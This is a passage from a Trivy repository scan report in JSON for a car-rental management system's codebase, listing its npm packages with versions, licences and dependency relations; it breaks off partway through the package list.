{ "SchemaVersion": 2, "Trivy": { "Version": "0.70.0" }, "ReportID": "019e493e-bb55-7aea-a306-c36f2373dbd8", "CreatedAt": "2026-05-21T06:35:08.501720513Z", "ArtifactID": "sha256:7d573aa59656fc97bcbc67a77e29bcea2ff62dbc23b95e895c6fe045a270a422", "ArtifactName": "/scan", "ArtifactType": "repository", "Metadata": { "RepoURL": "https://gitlab.rentaldrivego.ma/rental_car/car_management_system.git", "Branch": "develop", "Commit": "e74681e810a0eec89557d76afe565a6afefd5df0", "CommitMsg": "fix the upload issue and add driver license upload", "Author": "root \u003cmoulay.elabidi@gmail.com\u003e", "Committer": "root \u003cmoulay.elabidi@gmail.com\u003e" }, "Results": [ { "Target": "package-lock.json", "Class": "lang-pkgs", "Type": "npm", "Packages": [ { "ID": "@rentaldrivego/admin@1.0.0", "Name": "@rentaldrivego/admin", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/admin@1.0.0", "UID": "d35298d4b64ba129" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@rentaldrivego/types@1.0.0", "autoprefixer@10.5.0", "dayjs@1.11.20", "lucide-react@0.376.0", "next@14.2.3", "postcss@8.5.12", "react-dom@18.3.1", "react@18.3.1", "recharts@2.15.4", "tailwindcss@3.4.19", "zod@3.25.76" ], "Locations": [ { "StartLine": 26, "EndLine": 48 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/api@1.0.0", "Name": "@rentaldrivego/api", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/api@1.0.0", "UID": "800b4d4dcd94b343" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@react-pdf/renderer@3.4.5", "@rentaldrivego/database@1.0.0", "@rentaldrivego/types@1.0.0", "bcryptjs@2.4.3", "cors@2.8.6", "dayjs@1.11.20", "express-rate-limit@8.5.1", "express@4.22.1", "firebase-admin@12.7.0", "helmet@7.2.0", "ioredis@5.10.1", "jsonwebtoken@9.0.3", "morgan@1.10.1", "multer@1.4.5-lts.2", "node-cron@3.0.3", "nodemailer@6.10.1", "otplib@12.0.1", "qrcode@1.5.4", "react-dom@18.3.1", "react@18.3.1", "resend@3.5.0", "socket.io@4.8.3", "twilio@5.13.1", "zod@3.25.76" ], "Locations": [ { "StartLine": 49, "EndLine": 97 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/dashboard@1.0.0", "Name": "@rentaldrivego/dashboard", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/dashboard@1.0.0", "UID": "185bb7d27d9f96b2" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@rentaldrivego/types@1.0.0", "autoprefixer@10.5.0", "dayjs@1.11.20", "lucide-react@0.376.0", "next@14.2.3", "postcss@8.5.12", "react-dom@18.3.1", "react@18.3.1", "recharts@2.15.4", "sharp@0.34.5", "socket.io-client@4.8.3", "tailwindcss@3.4.19", "zod@3.25.76" ], "Locations": [ { "StartLine": 98, "EndLine": 122 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/database@1.0.0", "Name": "@rentaldrivego/database", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/database@1.0.0", "UID": "2eb55b2a36401afc" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@prisma/client@5.22.0" ], "Locations": [ { "StartLine": 10691, "EndLine": 10705 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/marketplace@1.0.0", "Name": "@rentaldrivego/marketplace", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/marketplace@1.0.0", "UID": "29959651b2b1df22" }, "Version": "1.0.0", "Relationship": "direct", "DependsOn": [ "@rentaldrivego/types@1.0.0", "autoprefixer@10.5.0", "dayjs@1.11.20", "lucide-react@0.376.0", "next@14.2.3", "postcss@8.5.12", "react-dom@18.3.1", "react@18.3.1", "tailwindcss@3.4.19", "zod@3.25.76" ], "Locations": [ { "StartLine": 123, "EndLine": 144 } ], "AnalyzedBy": "npm" }, { "ID": "@rentaldrivego/types@1.0.0", "Name": "@rentaldrivego/types", "Identifier": { "PURL": "pkg:npm/%40rentaldrivego/types@1.0.0", "UID": "9cfb68955b685b20" }, "Version": "1.0.0", "Relationship": "direct", "Locations": [ { "StartLine": 10706, "EndLine": 10712 } ], "AnalyzedBy": "npm" }, { "ID": "@types/node@20.19.39", "Name": "@types/node", "Identifier": { "PURL": "pkg:npm/%40types/node@20.19.39", "UID": "e52466e0f5d6ae34" }, "Version": "20.19.39", "Licenses": [ "MIT" ], "Relationship": "direct", "DependsOn": [ "undici-types@6.21.0" ], "Locations": [ { "StartLine": 2991, "EndLine": 2999 } ], "AnalyzedBy": "npm" }, { "ID": "@alloc/quick-lru@5.2.0", "Name": "@alloc/quick-lru", "Identifier": { "PURL": "pkg:npm/%40alloc/quick-lru@5.2.0", "UID": "eabc09a8e2d7cc74" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 168, "EndLine": 179 } ], "AnalyzedBy": "npm" }, { "ID": "@babel/runtime@7.29.2", "Name": "@babel/runtime", "Identifier": { "PURL": "pkg:npm/%40babel/runtime@7.29.2", "UID": "efdc60895ed7e484" }, "Version": "7.29.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 180, "EndLine": 188 } ], "AnalyzedBy": "npm" }, { "ID": "@emnapi/runtime@1.10.0", "Name": "@emnapi/runtime", "Identifier": { "PURL": "pkg:npm/%40emnapi/runtime@1.10.0", "UID": "887f8b1c4a506fdd" }, "Version": "1.10.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.4.1" ], "Locations": [ { "StartLine": 213, "EndLine": 222 } ], "AnalyzedBy": "npm" }, { "ID": "@fastify/busboy@3.2.0", "Name": "@fastify/busboy", "Identifier": { "PURL": "pkg:npm/%40fastify/busboy@3.2.0", "UID": "b086cb7586830ce9" }, "Version": "3.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 677, "EndLine": 682 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-check-interop-types@0.3.2", "Name": "@firebase/app-check-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-check-interop-types@0.3.2", "UID": "5c211ec741afd152" }, "Version": "0.3.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 683, "EndLine": 688 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/app-types@0.9.2", "Name": "@firebase/app-types", "Identifier": { "PURL": "pkg:npm/%40firebase/app-types@0.9.2", "UID": "7c4c0d2da42707f7" }, "Version": "0.9.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 689, "EndLine": 694 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/auth-interop-types@0.2.3", "Name": "@firebase/auth-interop-types", "Identifier": { "PURL": "pkg:npm/%40firebase/auth-interop-types@0.2.3", "UID": "9ef3fcde3df03910" }, "Version": "0.2.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 695, "EndLine": 700 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/component@0.6.9", "Name": "@firebase/component", "Identifier": { "PURL": "pkg:npm/%40firebase/component@0.6.9", "UID": "efe79664f9c97535" }, "Version": "0.6.9", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/util@1.10.0", "tslib@2.4.1" ], "Locations": [ { "StartLine": 701, "EndLine": 710 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database@1.0.8", "Name": "@firebase/database", "Identifier": { "PURL": "pkg:npm/%40firebase/database@1.0.8", "UID": "971444f40948bb4b" }, "Version": "1.0.8", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-check-interop-types@0.3.2", "@firebase/auth-interop-types@0.2.3", "@firebase/component@0.6.9", "@firebase/logger@0.4.2", "@firebase/util@1.10.0", "faye-websocket@0.11.4", "tslib@2.4.1" ], "Locations": [ { "StartLine": 711, "EndLine": 725 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database-compat@1.0.8", "Name": "@firebase/database-compat", "Identifier": { "PURL": "pkg:npm/%40firebase/database-compat@1.0.8", "UID": "746ad7a0bc86a1ea" }, "Version": "1.0.8", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/component@0.6.9", "@firebase/database-types@1.0.5", "@firebase/database@1.0.8", "@firebase/logger@0.4.2", "@firebase/util@1.10.0", "tslib@2.4.1" ], "Locations": [ { "StartLine": 726, "EndLine": 739 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/database-types@1.0.5", "Name": "@firebase/database-types", "Identifier": { "PURL": "pkg:npm/%40firebase/database-types@1.0.5", "UID": "e6ebc274d6ea6673" }, "Version": "1.0.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@firebase/app-types@0.9.2", "@firebase/util@1.10.0" ], "Locations": [ { "StartLine": 740, "EndLine": 749 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/logger@0.4.2", "Name": "@firebase/logger", "Identifier": { "PURL": "pkg:npm/%40firebase/logger@0.4.2", "UID": "c0fb267079ddd272" }, "Version": "0.4.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.4.1" ], "Locations": [ { "StartLine": 750, "EndLine": 758 } ], "AnalyzedBy": "npm" }, { "ID": "@firebase/util@1.10.0", "Name": "@firebase/util", "Identifier": { "PURL": "pkg:npm/%40firebase/util@1.10.0", "UID": "9fa386d605e9d2d3" }, "Version": "1.10.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tslib@2.4.1" ], "Locations": [ { "StartLine": 759, "EndLine": 767 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/firestore@7.11.6", "Name": "@google-cloud/firestore", "Identifier": { "PURL": "pkg:npm/%40google-cloud/firestore@7.11.6", "UID": "55559b9964eb1328" }, "Version": "7.11.6", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@opentelemetry/api@1.9.1", "fast-deep-equal@3.1.3", "functional-red-black-tree@1.0.1", "google-gax@4.6.1", "protobufjs@7.5.6" ], "Locations": [ { "StartLine": 768, "EndLine": 784 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/paginator@5.0.2", "Name": "@google-cloud/paginator", "Identifier": { "PURL": "pkg:npm/%40google-cloud/paginator@5.0.2", "UID": "25b399e30c6d265e" }, "Version": "5.0.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "arrify@2.0.1", "extend@3.0.2" ], "Locations": [ { "StartLine": 785, "EndLine": 798 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/projectify@4.0.0", "Name": "@google-cloud/projectify", "Identifier": { "PURL": "pkg:npm/%40google-cloud/projectify@4.0.0", "UID": "7a4577274004ad22" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 799, "EndLine": 808 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/promisify@4.0.0", "Name": "@google-cloud/promisify", "Identifier": { "PURL": "pkg:npm/%40google-cloud/promisify@4.0.0", "UID": "403868c2bf98af32" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 809, "EndLine": 818 } ], "AnalyzedBy": "npm" }, { "ID": "@google-cloud/storage@7.19.0", "Name": "@google-cloud/storage", "Identifier": { "PURL": "pkg:npm/%40google-cloud/storage@7.19.0", "UID": "d38daf4c32ee8b21" }, "Version": "7.19.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@google-cloud/paginator@5.0.2", "@google-cloud/projectify@4.0.0", "@google-cloud/promisify@4.0.0", "abort-controller@3.0.0", "async-retry@1.3.3", "duplexify@4.1.3", "fast-xml-parser@5.7.2", "gaxios@6.7.1", "google-auth-library@9.15.1", "html-entities@2.6.0", "mime@3.0.0", "p-limit@3.1.0", "retry-request@7.0.2", "teeny-request@9.0.0", "uuid@8.3.2" ], "Locations": [ { "StartLine": 819, "EndLine": 845 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/grpc-js@1.14.3", "Name": "@grpc/grpc-js", "Identifier": { "PURL": "pkg:npm/%40grpc/grpc-js@1.14.3", "UID": "70c358a80b4c403b" }, "Version": "1.14.3", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@grpc/proto-loader@0.8.0", "@js-sdsl/ordered-map@4.4.2" ], "Locations": [ { "StartLine": 857, "EndLine": 870 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/proto-loader@0.7.15", "Name": "@grpc/proto-loader", "Identifier": { "PURL": "pkg:npm/%40grpc/proto-loader@0.7.15", "UID": "59377ee7fd481b41" }, "Version": "0.7.15", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.camelcase@4.3.0", "long@5.3.2", "protobufjs@7.5.6", "yargs@17.7.2" ], "Locations": [ { "StartLine": 890, "EndLine": 908 } ], "AnalyzedBy": "npm" }, { "ID": "@grpc/proto-loader@0.8.0", "Name": "@grpc/proto-loader", "Identifier": { "PURL": "pkg:npm/%40grpc/proto-loader@0.8.0", "UID": "4cbcda42bf72ec9d" }, "Version": "0.8.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "lodash.camelcase@4.3.0", "long@5.3.2", "protobufjs@7.5.6", "yargs@17.7.2" ], "Locations": [ { "StartLine": 871, "EndLine": 889 } ], "AnalyzedBy": "npm" }, { "ID": "@img/colour@1.1.0", "Name": "@img/colour", "Identifier": { "PURL": "pkg:npm/%40img/colour@1.1.0", "UID": "9d0c7d76d679b63d" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 947, "EndLine": 955 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-darwin-arm64@0.34.5", "Name": "@img/sharp-darwin-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-darwin-arm64@0.34.5", "UID": "15ef5e9f162f322" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-darwin-arm64@1.2.4" ], "Locations": [ { "StartLine": 956, "EndLine": 977 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-darwin-x64@0.34.5", "Name": "@img/sharp-darwin-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-darwin-x64@0.34.5", "UID": "2ec77cf73c13551d" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-darwin-x64@1.2.4" ], "Locations": [ { "StartLine": 978, "EndLine": 999 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-darwin-arm64@1.2.4", "Name": "@img/sharp-libvips-darwin-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4", "UID": "fb62065f95b673a9" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1000, "EndLine": 1015 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-darwin-x64@1.2.4", "Name": "@img/sharp-libvips-darwin-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4", "UID": "e40f68495375eaaf" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1016, "EndLine": 1031 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-arm@1.2.4", "Name": "@img/sharp-libvips-linux-arm", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4", "UID": "e27c6b80e397d663" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1032, "EndLine": 1047 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-arm64@1.2.4", "Name": "@img/sharp-libvips-linux-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4", "UID": "45b2773dcb5ab1a4" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1048, "EndLine": 1063 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-ppc64@1.2.4", "Name": "@img/sharp-libvips-linux-ppc64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4", "UID": "548a5c39a3135e47" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1064, "EndLine": 1079 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-riscv64@1.2.4", "Name": "@img/sharp-libvips-linux-riscv64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4", "UID": "9606965de0037f3" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1080, "EndLine": 1095 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-s390x@1.2.4", "Name": "@img/sharp-libvips-linux-s390x", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4", "UID": "8352c8fc4e5177c0" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1096, "EndLine": 1111 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linux-x64@1.2.4", "Name": "@img/sharp-libvips-linux-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4", "UID": "a4c9c40a861aaffd" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1112, "EndLine": 1127 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linuxmusl-arm64@1.2.4", "Name": "@img/sharp-libvips-linuxmusl-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4", "UID": "17970487abb86e87" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1128, "EndLine": 1143 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-libvips-linuxmusl-x64@1.2.4", "Name": "@img/sharp-libvips-linuxmusl-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4", "UID": "c54318b56fe1db3a" }, "Version": "1.2.4", "Licenses": [ "LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1144, "EndLine": 1159 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-arm@0.34.5", "Name": "@img/sharp-linux-arm", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-arm@0.34.5", "UID": "75c52b2d9a150fd" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-arm@1.2.4" ], "Locations": [ { "StartLine": 1160, "EndLine": 1181 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-arm64@0.34.5", "Name": "@img/sharp-linux-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-arm64@0.34.5", "UID": "13a77720bf2aeaaf" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-arm64@1.2.4" ], "Locations": [ { "StartLine": 1182, "EndLine": 1203 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-ppc64@0.34.5", "Name": "@img/sharp-linux-ppc64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-ppc64@0.34.5", "UID": "5f296de259dc5fcd" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-ppc64@1.2.4" ], "Locations": [ { "StartLine": 1204, "EndLine": 1225 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-riscv64@0.34.5", "Name": "@img/sharp-linux-riscv64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-riscv64@0.34.5", "UID": "cff738e1ea5bf03f" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-riscv64@1.2.4" ], "Locations": [ { "StartLine": 1226, "EndLine": 1247 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-s390x@0.34.5", "Name": "@img/sharp-linux-s390x", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-s390x@0.34.5", "UID": "5ba6c19adc33acb1" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-s390x@1.2.4" ], "Locations": [ { "StartLine": 1248, "EndLine": 1269 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linux-x64@0.34.5", "Name": "@img/sharp-linux-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linux-x64@0.34.5", "UID": "899053386aaceb6f" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linux-x64@1.2.4" ], "Locations": [ { "StartLine": 1270, "EndLine": 1291 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linuxmusl-arm64@0.34.5", "Name": "@img/sharp-linuxmusl-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5", "UID": "49434b0f2e4c552" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linuxmusl-arm64@1.2.4" ], "Locations": [ { "StartLine": 1292, "EndLine": 1313 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-linuxmusl-x64@0.34.5", "Name": "@img/sharp-linuxmusl-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-linuxmusl-x64@0.34.5", "UID": "ad906505494c6eb4" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@img/sharp-libvips-linuxmusl-x64@1.2.4" ], "Locations": [ { "StartLine": 1314, "EndLine": 1335 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-wasm32@0.34.5", "Name": "@img/sharp-wasm32", "Identifier": { "PURL": "pkg:npm/%40img/sharp-wasm32@0.34.5", "UID": "d2f6e4040e44ad8" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later AND MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@emnapi/runtime@1.10.0" ], "Locations": [ { "StartLine": 1336, "EndLine": 1354 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-win32-arm64@0.34.5", "Name": "@img/sharp-win32-arm64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-win32-arm64@0.34.5", "UID": "6e6d038a733af9f8" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1355, "EndLine": 1373 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-win32-ia32@0.34.5", "Name": "@img/sharp-win32-ia32", "Identifier": { "PURL": "pkg:npm/%40img/sharp-win32-ia32@0.34.5", "UID": "b8c0b96d5b9c4a91" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1374, "EndLine": 1392 } ], "AnalyzedBy": "npm" }, { "ID": "@img/sharp-win32-x64@0.34.5", "Name": "@img/sharp-win32-x64", "Identifier": { "PURL": "pkg:npm/%40img/sharp-win32-x64@0.34.5", "UID": "2ab4e03baef70224" }, "Version": "0.34.5", "Licenses": [ "Apache-2.0 AND LGPL-3.0-or-later" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1393, "EndLine": 1411 } ], "AnalyzedBy": "npm" }, { "ID": "@ioredis/commands@1.5.1", "Name": "@ioredis/commands", "Identifier": { "PURL": "pkg:npm/%40ioredis/commands@1.5.1", "UID": "eb47b9c38c9e63e9" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1412, "EndLine": 1417 } ], "AnalyzedBy": "npm" }, { "ID": "@isaacs/cliui@8.0.2", "Name": "@isaacs/cliui", "Identifier": { "PURL": "pkg:npm/%40isaacs/cliui@8.0.2", "UID": "64e2e3f4f3e76f6b" }, "Version": "8.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width-cjs@4.2.3", "string-width@5.1.2", "strip-ansi-cjs@6.0.1", "strip-ansi@7.2.0", "wrap-ansi-cjs@7.0.0", "wrap-ansi@8.1.0" ], "Locations": [ { "StartLine": 1418, "EndLine": 1434 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/gen-mapping@0.3.13", "Name": "@jridgewell/gen-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/gen-mapping@0.3.13", "UID": "efcecdf52b58c26c" }, "Version": "0.3.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/sourcemap-codec@1.5.5", "@jridgewell/trace-mapping@0.3.31" ], "Locations": [ { "StartLine": 1527, "EndLine": 1536 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/resolve-uri@3.1.2", "Name": "@jridgewell/resolve-uri", "Identifier": { "PURL": "pkg:npm/%40jridgewell/resolve-uri@3.1.2", "UID": "4ce5eea195f9e6c8" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1537, "EndLine": 1545 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/sourcemap-codec@1.5.5", "Name": "@jridgewell/sourcemap-codec", "Identifier": { "PURL": "pkg:npm/%40jridgewell/sourcemap-codec@1.5.5", "UID": "5dfab96ed52867bb" }, "Version": "1.5.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1546, "EndLine": 1551 } ], "AnalyzedBy": "npm" }, { "ID": "@jridgewell/trace-mapping@0.3.31", "Name": "@jridgewell/trace-mapping", "Identifier": { "PURL": "pkg:npm/%40jridgewell/trace-mapping@0.3.31", "UID": "9d887a1a1186978e" }, "Version": "0.3.31", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/resolve-uri@3.1.2", "@jridgewell/sourcemap-codec@1.5.5" ], "Locations": [ { "StartLine": 1552, "EndLine": 1561 } ], "AnalyzedBy": "npm" }, { "ID": "@js-sdsl/ordered-map@4.4.2", "Name": "@js-sdsl/ordered-map", "Identifier": { "PURL": "pkg:npm/%40js-sdsl/ordered-map@4.4.2", "UID": "8493d79cfa46f213" }, "Version": "4.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1562, "EndLine": 1572 } ], "AnalyzedBy": "npm" }, { "ID": "@next/env@14.2.3", "Name": "@next/env", "Identifier": { "PURL": "pkg:npm/%40next/env@14.2.3", "UID": "53a37ed9fb3e5ed2" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1573, "EndLine": 1578 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-darwin-arm64@14.2.3", "Name": "@next/swc-darwin-arm64", "Identifier": { "PURL": "pkg:npm/%40next/swc-darwin-arm64@14.2.3", "UID": "d4e3d5157716fa8" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1579, "EndLine": 1594 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-darwin-x64@14.2.3", "Name": "@next/swc-darwin-x64", "Identifier": { "PURL": "pkg:npm/%40next/swc-darwin-x64@14.2.3", "UID": "5185d7b01816910f" }, "Version": "14.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1595, "EndLine": 1610 } ], "AnalyzedBy": "npm" }, { "ID": "@next/swc-linux-arm64-gnu@14.2.3", "Name": "@next/swc-linux-arm64-gnu", "Identifier": { "PURL": 